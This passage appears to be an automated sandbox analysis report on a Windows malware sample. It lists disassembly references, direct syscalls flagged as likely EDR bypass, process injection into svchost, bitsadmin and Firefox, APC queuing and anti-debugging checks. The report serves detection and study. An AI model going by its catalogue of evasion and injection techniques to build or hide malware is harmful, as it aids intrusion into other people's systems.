                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FE6ACC mov eax, dword ptr fs:[00000030h]3_2_02FE6ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03038B42 mov eax, dword ptr fs:[00000030h]3_2_03038B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03026B40 mov eax, dword ptr fs:[00000030h]3_2_03026B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03026B40 mov eax, dword ptr fs:[00000030h]3_2_03026B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305AB40 mov eax, dword ptr fs:[00000030h]3_2_0305AB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03044B4B mov eax, dword ptr fs:[00000030h]3_2_03044B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03044B4B mov eax, dword ptr fs:[00000030h]3_2_03044B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03062B57 mov eax, dword ptr fs:[00000030h]3_2_03062B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03062B57 mov eax, dword ptr fs:[00000030h]3_2_03062B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03062B57 mov eax, dword ptr fs:[00000030h]3_2_03062B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03062B57 mov eax, dword ptr fs:[00000030h]3_2_03062B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303EB50 mov eax, dword ptr fs:[00000030h]3_2_0303EB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F98AA0 mov eax, dword ptr fs:[00000030h]3_2_02F98AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F98AA0 mov eax, dword ptr fs:[00000030h]3_2_02F98AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FE6AA4 mov eax, dword ptr fs:[00000030h]3_2_02FE6AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FC8A90 mov edx, dword ptr fs:[00000030h]3_2_02FC8A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F9EA80 mov eax, dword ptr fs:[00000030h]3_2_02F9EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F9EA80 mov eax, dword ptr fs:[00000030h]3_2_02F9EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F9EA80 mov eax, dword ptr fs:[00000030h]3_2_02F9EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F9EA80 mov eax, dword ptr fs:[00000030h]3_2_02F9EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F9EA80 mov eax, dword ptr fs:[00000030h]3_2_02F9EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F9EA80 mov eax, dword ptr fs:[00000030h]3_2_02F9EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F9EA80 mov eax, dword ptr fs:[00000030h]3_2_02F9EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F9EA80 mov eax, dword ptr fs:[00000030h]3_2_02F9EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F9EA80 mov eax, dword ptr fs:[00000030h]3_2_02F9EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FCCA6F mov eax, dword ptr fs:[00000030h]3_2_02FCCA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FCCA6F mov eax, dword ptr fs:[00000030h]3_2_02FCCA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FCCA6F mov eax, dword ptr fs:[00000030h]3_2_02FCCA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FA0A5B mov eax, dword ptr fs:[00000030h]3_2_02FA0A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FA0A5B mov eax, dword ptr fs:[00000030h]3_2_02FA0A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F96A50 mov eax, dword ptr fs:[00000030h]3_2_02F96A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F96A50 mov eax, dword ptr fs:[00000030h]3_2_02F96A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F96A50 mov eax, dword ptr fs:[00000030h]3_2_02F96A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F96A50 mov eax, dword ptr fs:[00000030h]3_2_02F96A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F96A50 mov eax, dword ptr fs:[00000030h]3_2_02F96A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F96A50 mov eax, dword ptr fs:[00000030h]3_2_02F96A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F96A50 mov eax, dword ptr fs:[00000030h]3_2_02F96A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03044BB0 mov eax, dword ptr fs:[00000030h]3_2_03044BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03044BB0 mov eax, dword ptr fs:[00000030h]3_2_03044BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FCCA38 mov eax, dword ptr fs:[00000030h]3_2_02FCCA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FB4A35 mov eax, dword ptr fs:[00000030h]3_2_02FB4A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FB4A35 mov eax, dword ptr fs:[00000030h]3_2_02FB4A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303EBD0 mov eax, dword ptr fs:[00000030h]3_2_0303EBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FBEA2E mov eax, dword ptr fs:[00000030h]3_2_02FBEA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FCCA24 mov eax, dword ptr fs:[00000030h]3_2_02FCCA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0301CBF0 mov eax, dword ptr fs:[00000030h]3_2_0301CBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FBEBFC mov eax, dword ptr fs:[00000030h]3_2_02FBEBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F98BF0 mov eax, dword ptr fs:[00000030h]3_2_02F98BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F98BF0 mov eax, dword ptr fs:[00000030h]3_2_02F98BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F98BF0 mov eax, dword ptr fs:[00000030h]3_2_02F98BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0301CA11 mov eax, dword ptr fs:[00000030h]3_2_0301CA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FB0BCB mov eax, dword ptr fs:[00000030h]3_2_02FB0BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FB0BCB mov eax, dword ptr fs:[00000030h]3_2_02FB0BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FB0BCB mov eax, dword ptr fs:[00000030h]3_2_02FB0BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F90BCD mov eax, dword ptr fs:[00000030h]3_2_02F90BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F90BCD mov eax, dword ptr fs:[00000030h]3_2_02F90BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F90BCD mov eax, dword ptr fs:[00000030h]3_2_02F90BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FA0BBE mov eax, dword ptr fs:[00000030h]3_2_02FA0BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FA0BBE mov eax, dword ptr fs:[00000030h]3_2_02FA0BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303EA60 mov eax, dword ptr fs:[00000030h]3_2_0303EA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0300CA72 mov eax, dword ptr fs:[00000030h]3_2_0300CA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0300CA72 mov eax, dword ptr fs:[00000030h]3_2_0300CA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F8CB7E mov eax, dword ptr fs:[00000030h]3_2_02F8CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03064A80 mov eax, dword ptr fs:[00000030h]3_2_03064A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F88B50 mov eax, dword ptr fs:[00000030h]3_2_02F88B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FBEB20 mov eax, dword ptr fs:[00000030h]3_2_02FBEB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FBEB20 mov eax, dword ptr fs:[00000030h]3_2_02FBEB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FCC8F9 mov eax, dword ptr fs:[00000030h]3_2_02FCC8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FCC8F9 mov eax, dword ptr fs:[00000030h]3_2_02FCC8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0300E908 mov eax, dword ptr fs:[00000030h]3_2_0300E908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0300E908 mov eax, dword ptr fs:[00000030h]3_2_0300E908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0301C912 mov eax, dword ptr fs:[00000030h]3_2_0301C912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0302892B mov eax, dword ptr fs:[00000030h]3_2_0302892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0301892A mov eax, dword ptr fs:[00000030h]3_2_0301892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FBE8C0 mov eax, dword ptr fs:[00000030h]3_2_02FBE8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03064940 mov eax, dword ptr fs:[00000030h]3_2_03064940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03010946 mov eax, dword ptr fs:[00000030h]3_2_03010946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03034978 mov eax, dword ptr fs:[00000030h]3_2_03034978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03034978 mov eax, dword ptr fs:[00000030h]3_2_03034978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0301C97C mov eax, dword ptr fs:[00000030h]3_2_0301C97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F90887 mov eax, dword ptr fs:[00000030h]3_2_02F90887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F94859 mov eax, dword ptr fs:[00000030h]3_2_02F94859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F94859 mov eax, dword ptr fs:[00000030h]3_2_02F94859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FC0854 mov eax, dword ptr fs:[00000030h]3_2_02FC0854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030189B3 mov esi, dword ptr fs:[00000030h]3_2_030189B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030189B3 mov eax, dword ptr fs:[00000030h]3_2_030189B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030189B3 mov eax, dword ptr fs:[00000030h]3_2_030189B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FA2840 mov ecx, dword ptr fs:[00000030h]3_2_02FA2840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030269C0 mov eax, dword ptr fs:[00000030h]3_2_030269C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FCA830 mov eax, dword ptr fs:[00000030h]3_2_02FCA830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FB2835 mov eax, dword ptr fs:[00000030h]3_2_02FB2835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FB2835 mov eax, dword ptr fs:[00000030h]3_2_02FB2835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FB2835 mov eax, dword ptr fs:[00000030h]3_2_02FB2835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FB2835 mov ecx, dword ptr fs:[00000030h]3_2_02FB2835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FB2835 mov eax, dword ptr fs:[00000030h]3_2_02FB2835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FB2835 mov eax, dword ptr fs:[00000030h]3_2_02FB2835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305A9D3 mov eax, dword ptr fs:[00000030h]3_2_0305A9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0301E9E0 mov eax, dword ptr fs:[00000030h]3_2_0301E9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FC29F9 mov eax, dword ptr fs:[00000030h]3_2_02FC29F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FC29F9 mov eax, dword ptr fs:[00000030h]3_2_02FC29F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0301C810 mov eax, dword ptr fs:[00000030h]3_2_0301C810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F9A9D0 mov eax, dword ptr fs:[00000030h]3_2_02F9A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F9A9D0 mov eax, dword ptr fs:[00000030h]3_2_02F9A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F9A9D0 mov eax, dword ptr fs:[00000030h]3_2_02F9A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F9A9D0 mov eax, dword ptr fs:[00000030h]3_2_02F9A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F9A9D0 mov eax, dword ptr fs:[00000030h]3_2_02F9A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F9A9D0 mov eax, dword ptr fs:[00000030h]3_2_02F9A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FC49D0 mov eax, dword ptr fs:[00000030h]3_2_02FC49D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303483A mov eax, dword ptr fs:[00000030h]3_2_0303483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303483A mov eax, dword ptr fs:[00000030h]3_2_0303483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F909AD mov eax, dword ptr fs:[00000030h]3_2_02F909AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F909AD mov eax, dword ptr fs:[00000030h]3_2_02F909AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FA29A0 mov eax, dword ptr fs:[00000030h]3_2_02FA29A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FA29A0 mov eax, dword ptr fs:[00000030h]3_2_02FA29A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FA29A0 mov eax, dword ptr fs:[00000030h]3_2_02FA29A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FA29A0 mov eax, dword ptr fs:[00000030h]3_2_02FA29A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FA29A0 mov eax, dword ptr fs:[00000030h]3_2_02FA29A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FA29A0 mov eax, dword ptr fs:[00000030h]3_2_02FA29A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FA29A0 mov eax, dword ptr fs:[00000030h]3_2_02FA29A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FA29A0 mov eax, dword ptr fs:[00000030h]3_2_02FA29A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FA29A0 mov eax, dword ptr fs:[00000030h]3_2_02FA29A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FA29A0 mov eax, dword ptr fs:[00000030h]3_2_02FA29A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FA29A0 mov eax, dword ptr fs:[00000030h]3_2_02FA29A0
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_004580A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_004580A9
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_0042A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A155
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_0042A124 SetUnhandledExceptionFilter,0_2_0042A124
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F51361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_02F51361
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F54C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_02F54C7B

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exeNtCreateMutant: Direct from: 0x774635CCJump to behavior
                Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exeNtWriteVirtualMemory: Direct from: 0x77462E3CJump to behavior
                Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exeNtMapViewOfSection: Direct from: 0x77462D1CJump to behavior
                Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exeNtResumeThread: Direct from: 0x774636ACJump to behavior
                Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exeNtProtectVirtualMemory: Direct from: 0x77462F9CJump to behavior
                Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exeNtSetInformationProcess: Direct from: 0x77462C5CJump to behavior
                Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exeNtSetInformationThread: Direct from: 0x774563F9Jump to behavior
                Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exeNtProtectVirtualMemory: Direct from: 0x77457B2EJump to behavior
                Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exeNtNotifyChangeKey: Direct from: 0x77463C2CJump to behavior
                Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exeNtAllocateVirtualMemory: Direct from: 0x77462BFCJump to behavior
                Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exeNtQueryInformationProcess: Direct from: 0x77462C26Jump to behavior
                Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exeNtResumeThread: Direct from: 0x77462FBCJump to behavior
                Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exeNtReadFile: Direct from: 0x77462ADCJump to behavior
                Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exeNtQuerySystemInformation: Direct from: 0x77462DFCJump to behavior
                Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exeNtDelayExecution: Direct from: 0x77462DDCJump to behavior
                Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exeNtAllocateVirtualMemory: Direct from: 0x77463C9CJump to behavior
                Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exeNtClose: Direct from: 0x77462B6C
                Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exeNtCreateUserProcess: Direct from: 0x7746371CJump to behavior
                Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exeNtWriteVirtualMemory: Direct from: 0x7746490CJump to behavior
                Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exeNtAllocateVirtualMemory: Direct from: 0x774648ECJump to behavior
                Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exeNtQuerySystemInformation: Direct from: 0x774648CCJump to behavior
                Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exeNtQueryVolumeInformationFile: Direct from: 0x77462F2CJump to behavior
                Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exeNtReadVirtualMemory: Direct from: 0x77462E8CJump to behavior
                Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exeNtCreateKey: Direct from: 0x77462C6CJump to behavior
                Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exeNtSetInformationThread: Direct from: 0x77462B4CJump to behavior
                Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exeNtQueryAttributesFile: Direct from: 0x77462E6CJump to behavior
                Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exeNtDeviceIoControlFile: Direct from: 0x77462AECJump to behavior
                Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exeNtOpenSection: Direct from: 0x77462E0CJump to behavior
                Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exeNtCreateFile: Direct from: 0x77462FECJump to behavior
                Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exeNtOpenFile: Direct from: 0x77462DCCJump to behavior
                Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exeNtQueryInformationToken: Direct from: 0x77462CACJump to behavior
                Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exeNtAllocateVirtualMemory: Direct from: 0x77462BECJump to behavior
                Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exeNtOpenKeyEx: Direct from: 0x77462B9CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\bitsadmin.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: NULL target: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: NULL target: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\bitsadmin.exeThread register set: target process: 2684Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\bitsadmin.exeThread APC queued: target process: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 273008Jump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_004587B1 LogonUserW,0_2_004587B1
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00403B3A
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004048D7
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_00464C53 mouse_event,0_2_00464C53
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\1SxKeB4u0c.exe"Jump to behavior
                Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\SysWOW64\bitsadmin.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_00457CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00457CAF
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_0045874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0045874B
                Source: 1SxKeB4u0c.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: 1SxKeB4u0c.exe, LbtMpScwNRqrVB.exe, 00000006.00000002.3896866146.00000000014E1000.00000002.00000001.00040000.00000000.sdmp, LbtMpScwNRqrVB.exe, 00000006.00000000.1603973747.00000000014E1000.00000002.00000001.00040000.00000000.sdmp, LbtMpScwNRqrVB.exe, 00000008.00000000.1750735039.00000000014D0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
